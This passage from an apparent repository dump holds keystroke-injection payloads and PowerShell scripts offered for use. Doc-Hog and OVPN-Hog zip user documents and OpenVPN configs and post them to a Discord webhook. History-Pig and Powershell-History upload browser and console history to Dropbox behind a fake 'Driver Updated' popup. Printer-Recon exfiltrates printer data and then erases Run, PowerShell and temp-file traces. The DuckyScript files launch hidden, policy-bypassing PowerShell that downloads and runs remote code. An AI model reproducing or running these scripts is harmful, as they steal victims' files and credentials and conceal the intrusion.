align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here:\n\n[atomiczsec](https://github.com/atomiczsec)\n[Sycnex](https://github.com/Sycnex/Windows10Debloater)\n[I am Jakoby](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n* [Sycnex - Creator Of The Tool](https://github.com/Sycnex/Windows10Debloater)\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Doc-Hog/d.ps1",
    "content": "function Doc-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n      'username' = $env:username\n      'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Files = Get-ChildItem -Path \"$env:HOMEPATH\" -Include \"*.docx\",\"*.doc\",\"*.pptx\",\"*.xlsx\",\"*.pdf\",\"*.jpeg\",\"*.png\",\"*.jpg\",\"*.csv\",\"*.txt\" -Recurse\n\n$types = @{\n    \"*.docx\" = \"Word\";\n    \"*.doc\" = \"Word\";\n    \"*.pptx\" = \"PowerPoint\";\n    \"*.xlsx\" = \"Excel\";\n    \"*.pdf\" = \"PDF\";\n    \"*.jpeg\" = \"JPEG\";\n    \"*.png\" = \"PNG\";\n    \"*.jpg\" = \"JPEG\";\n    \"*.csv\" = \"CSV\";\n    \"*.txt\" = \"Text\";\n}\n\nforeach ($type in $types.Keys) {\n    $filteredFiles = $Files | Where-Object {$_.Name -like $type}\n\n    if ($filteredFiles) {\n        $zipFile = \"$env:TEMP\\$($types[$type]).zip\"\n\n        $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n        Doc-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n    }\n}\n"
  },
  {
    "path": "OMG/payloads/Doc-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\nDEFINE URL http://new-url.com/powershell.ps1\r\n\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "OMG/payloads/Doc-Hog/readme.md",
    "content": "\r\n<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#getting-started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# Doc-Hog\r\n\r\nA payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV\r\n\r\n## Description\r\n\r\nThis payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "OMG/payloads/History-Pig/HP.ps1",
    "content": "#History-Pig\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Chrome History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Chrome History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_chrome_history\"\r\n     Copy-Item \"$env:USERPROFILE/AppData/Local/Google/Chrome/User Data/Default/History\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -PathType Leaf)) {\r\n    try {\r\n        Write-Host \"The Edge History file has not been found. \"\r\n    }\r\n    catch {\r\n        throw $_.Exception.Message\r\n    }\r\n}\r\n # Copy Edge History to Temp Directory to get sent to Dropbox\r\n else {\r\n    $F2 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_edge_history\"\r\n    Copy-Item \"$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/History\" -Destination \"$env:tmp/$F2\" \r\n}\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"ADD-YOUR-DROPBOX-TOKEN-HERE\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\nDropBox-Upload -f \"$env:tmp/$F2\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "OMG/payloads/History-Pig/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;History+Pig!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# History-Pig\n\nA payload to exfiltrate the history of the 2 most popular browsers\n\n## Description\n\nThis payload will enumerate through the browser directories, looking for the file that stores the history\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10,11\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/History-Pig/payload.txt",
    "content": "REM     Title: History-Pig\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate browsers history to a dropbox\r\n\r\nREM     Target: Windows 10, 11\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "OMG/payloads/OVPN-Hog/o.ps1",
    "content": "function OVPN-Hog {\n    [CmdletBinding()]\n    param (\n        [parameter(Position=0,Mandatory=$False)]\n        [string]$file,\n        [parameter(Position=1,Mandatory=$False)]\n        [string]$text \n    )\n\n    $hookurl = 'DISCORD-WEBHOOK'\n\n    $Body = @{\n        'username' = $env:username\n        'content' = $text\n    }\n\n    if (-not ([string]::IsNullOrEmpty($text))) {\n        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)\n    }\n\n    if (-not ([string]::IsNullOrEmpty($file))) {\n        curl.exe -F \"file1=@$file\" $hookurl\n    }\n}\n\n$Drive = \"C:\"\n\n$Files = Get-ChildItem -Path $Drive -Filter \"*.ovpn\" -File -Recurse\n\nif ($Files) {\n    $types = @{\n        \"*.ovpn\" = \"OpenVPN\"\n    }\n\n    foreach ($type in $types.Keys) {\n        $filteredFiles = $Files | Where-Object { $_.Name -like $type }\n\n        if ($filteredFiles) {\n            $zipFile = Join-Path -Path $env:TEMP -ChildPath \"$($types[$type]).zip\"\n\n            $filteredFiles | Compress-Archive -DestinationPath $zipFile\n\n            OVPN-Hog -file $zipFile -text \"Uploading $($types[$type]) files\"\n        }\n    }\n}\n"
  },
  {
    "path": "OMG/payloads/OVPN-Hog/payload.txt",
    "content": "REM     Title: Doc-Hog\r\nREM     Author: atomiczsec\r\nREM     Description: This payload will enumerate through the files looking for \".ovpn\" files. Then create ZIPs with them, then send to a discord webhook.\r\n\r\nDEFINE URL http://new-url.com/powershell.ps1\r\n\r\nREM     Target: Windows 10\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl\r\nENTER\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1"
  },
  {
    "path": "OMG/payloads/OVPN-Hog/readme.md",
    "content": "<h1 align=\"center\">\r\n  <a href=\"https://git.io/typing-svg\">\r\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;OVPN-Hog!+😈&center=true&size=30\">\r\n  </a>\r\n</h1>\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details>\r\n  <summary>Table of Contents</summary>\r\n  <ol>\r\n    <li><a href=\"#Description\">Description</a></li>\r\n    <li><a href=\"#Getting-Started\">Getting Started</a></li>\r\n    <li><a href=\"#Contributing\">Contributing</a></li>\r\n    <li><a href=\"#Version-History\">Version History</a></li>\r\n    <li><a href=\"#Contact\">Contact</a></li>\r\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\r\n  </ol>\r\n</details>\r\n\r\n# OVPN-Hog\r\n\r\nA PowerShell script to search for and exfiltrate OpenVPN configuration files (.ovpn).\r\n\r\n## Description\r\n\r\nThis script searches the entire C: drive of a Windows 10 or 11 machine for OpenVPN configuration files with the .ovpn extension. It then creates a zip archive containing the discovered files and uploads it to a Discord webhook.\r\n\r\n## Getting Started\r\n\r\n### Dependencies\r\n\r\n* DropBox or other file sharing service - Your Shared link for the intended file\r\n* Windows 10,11\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n### Executing program\r\n\r\n* Plug in your device\r\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\r\n```\r\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\r\n```\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Contributing\r\n\r\nAll contributors names will be listed here\r\n\r\natomiczsec\r\n\r\nI am Jakoby\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n## Version History\r\n\r\n* 0.1\r\n    * Initial Release\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- CONTACT -->\r\n## Contact\r\n\r\n<div align=\"center\">\r\n  <a href=\"https://lnk.bio/atomiczsec\">\r\n    <img src=\"https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg\" width=\"48\" height=\"48\" alt=\"Link\" />\r\n  </a>\r\n</div>\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n\r\n\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\r\n\r\n<!-- ACKNOWLEDGMENTS -->\r\n## Acknowledgments\r\n\r\n* [Hak5](https://hak5.org/)\r\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\r\n\r\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>"
  },
  {
    "path": "OMG/payloads/Powershell-History/PH.ps1",
    "content": "#Powershell-History\r\n\r\n# See if file is a thing\r\nTest-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf\r\n\r\n#If the file does not exist, write to host.\r\nif (-not(Test-Path -Path \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -PathType Leaf)) {\r\n     try {\r\n         Write-Host \"The Powershell History file has not been found. \"\r\n     }\r\n     catch {\r\n         throw $_.Exception.Message\r\n     }\r\n }\r\n # Copy Powershell History to Temp Directory to get sent to Dropbox\r\n  else {\r\n     $F1 = \"$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_ps_history.txt\"\r\n     Copy-Item \"$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\" -Destination \"$env:tmp/$F1\" \r\n }\r\n\r\n\r\nfunction DropBox-Upload {\r\n\r\n    [CmdletBinding()]\r\n    param (\r\n        \r\n    [Parameter (Mandatory = $True, ValueFromPipeline = $True)]\r\n    [Alias(\"f\")]\r\n    [string]$SourceFilePath\r\n    ) \r\n    $DropBoxAccessToken = \"YOUR-DROPBOX-ACCESS-TOKEN\"   # Replace with your DropBox Access Token\r\n    $outputFile = Split-Path $SourceFilePath -leaf\r\n    $TargetFilePath=\"/$outputFile\"\r\n    $arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\r\n    $authorization = \"Bearer \" + $DropBoxAccessToken\r\n    $headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\r\n    $headers.Add(\"Authorization\", $authorization)\r\n    $headers.Add(\"Dropbox-API-Arg\", $arg)\r\n    $headers.Add(\"Content-Type\", 'application/octet-stream')\r\n    Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\r\n    }\r\n\r\nDropBox-Upload -f \"$env:tmp/$F1\"\r\n\r\n$done = New-Object -ComObject Wscript.Shell;$done.Popup(\"Driver Updated\",1)\r\n"
  },
  {
    "path": "OMG/payloads/Powershell-History/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Powershell+History!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Powershell-History\n\nA payload to exfiltrate the history of the powershell console\n\n## Description\n\nThis payload will enumerate through the powershell directories, looking for the file that stores the history of the powershell console\n\nThese files will be saved to the temp directory\n\nFinally dropbox will be used to exfiltrate the files to cloud storage\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
    "path": "OMG/payloads/Powershell-History/payload.txt",
    "content": "REM     Title: Powershell-History\r\n\r\nREM     Author: atomiczsec\r\n\r\nREM     Description: This payload is meant to exfiltrate powershells history to a dropbox, powershell is commonly used for IT automation\r\n\r\nREM     Target: Windows 10\r\n\r\nDELAY 2000\r\nGUI r\r\nDELAY 500\r\nSTRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> dl=1; iex $pl\r\nENTER\r\n\r\nREM     Remember to replace the link with your DropBox shared link for the intended file to download\r\nREM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1\r\n"
  },
  {
    "path": "OMG/payloads/Printer-Recon/PR.ps1",
    "content": "function DropBox-Upload {\n\n[CmdletBinding()]\nparam (\n\t\n[Parameter (Mandatory = $True, ValueFromPipeline = $True)]\n[Alias(\"f\")]\n[string]$SourceFilePath\n) \n$DropBoxAccessToken = \"YOUR-DROPBOX-TOKEN\"   # Replace with your DropBox Access Token\n$outputFile = Split-Path $SourceFilePath -leaf\n$TargetFilePath=\"/$outputFile\"\n$arg = '{ \"path\": \"' + $TargetFilePath + '\", \"mode\": \"add\", \"autorename\": true, \"mute\": false }'\n$authorization = \"Bearer \" + $DropBoxAccessToken\n$headers = New-Object \"System.Collections.Generic.Dictionary[[String],[String]]\"\n$headers.Add(\"Authorization\", $authorization)\n$headers.Add(\"Dropbox-API-Arg\", $arg)\n$headers.Add(\"Content-Type\", 'application/octet-stream')\nInvoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers\n}\n\nfunction Clean-Exfil { \n\n# empty temp folder\nrm $env:TEMP\\* -r -Force -ErrorAction SilentlyContinue\n\n# delete run box history\nreg delete HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /va /f\n\n# Delete powershell history\nRemove-Item (Get-PSreadlineOption).HistorySavePath\n\n# Empty recycle bin\nClear-RecycleBin -Force -ErrorAction SilentlyContinue\n\n}\n\n$F1 = \"$env:tmp/$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_PrinterDriver.txt\"\n\nGet-Printer | Select-Object Name, Type, DriverName, Shared, Location > $F1\n\nDropBox-Upload -f $F1\n\nClean-Exfil\n\n\n\n\n\n"
  },
  {
    "path": "OMG/payloads/Printer-Recon/README.md",
    "content": "<h1 align=\"center\">\n  <a href=\"https://git.io/typing-svg\">\n    <img src=\"https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Printer+Recon!+😈&center=true&size=30\">\n  </a>\n</h1>\n\n<!-- TABLE OF CONTENTS -->\n<details>\n  <summary>Table of Contents</summary>\n  <ol>\n    <li><a href=\"#Description\">Description</a></li>\n    <li><a href=\"#getting-started\">Getting Started</a></li>\n    <li><a href=\"#Contributing\">Contributing</a></li>\n    <li><a href=\"#Version-History\">Version History</a></li>\n    <li><a href=\"#Contact\">Contact</a></li>\n    <li><a href=\"#Acknowledgments\">Acknowledgments</a></li>\n  </ol>\n</details>\n\n# Printer-Recon\n\n## Description\n\nThis payload is meant to exfiltrate printer information for further social engineering or driver explotation. Can also be used to find printer web interfaces on the network\n\n## Getting Started\n\n### Dependencies\n\n* DropBox or other file sharing service - Your Shared link for the intended file\n* Windows 10\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n### Executing program\n\n* Plug in your device\n* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory\n```\npowershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl\n```\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Contributing\n\nAll contributors names will be listed here\n\natomiczsec\n\nI am Jakoby\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n## Version History\n\n* 0.1\n    * Initial Release\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- CONTACT -->\n## Contact\n\n<h2 align=\"center\">📱 My Socials 📱</h2>\n<div align=center>\n<table>\n  <tr>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://www.youtube.com/channel/UC-7iJTFN8-CsTTuXd3Va6mA?sub_confirmation=1\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"C#\" />\n      </a>\n      <br>YouTube\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://twitter.com/atomiczsec\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width=\"48\" height=\"48\" alt=\"Python\" />\n      </a>\n      <br>Twitter\n    </td>\n    <td align=\"center\" width=\"96\">\n      <a href=\"https://discord.gg/MYYER2ZcJF\">\n        <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width=\"48\" height=\"48\" alt=\"Jsonnet\" />\n      </a>\n      <br>I-Am-Jakoby's Discord\n    </td>\n  </tr>\n</table>\n</div>\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n\n\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n\n<!-- ACKNOWLEDGMENTS -->\n## Acknowledgments\n\n* [Hak5](https://hak5.org/)\n* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)\n\n<p align=\"right\">(<a href=\"#top\">back to top</a>)</p>\n"
  },
  {
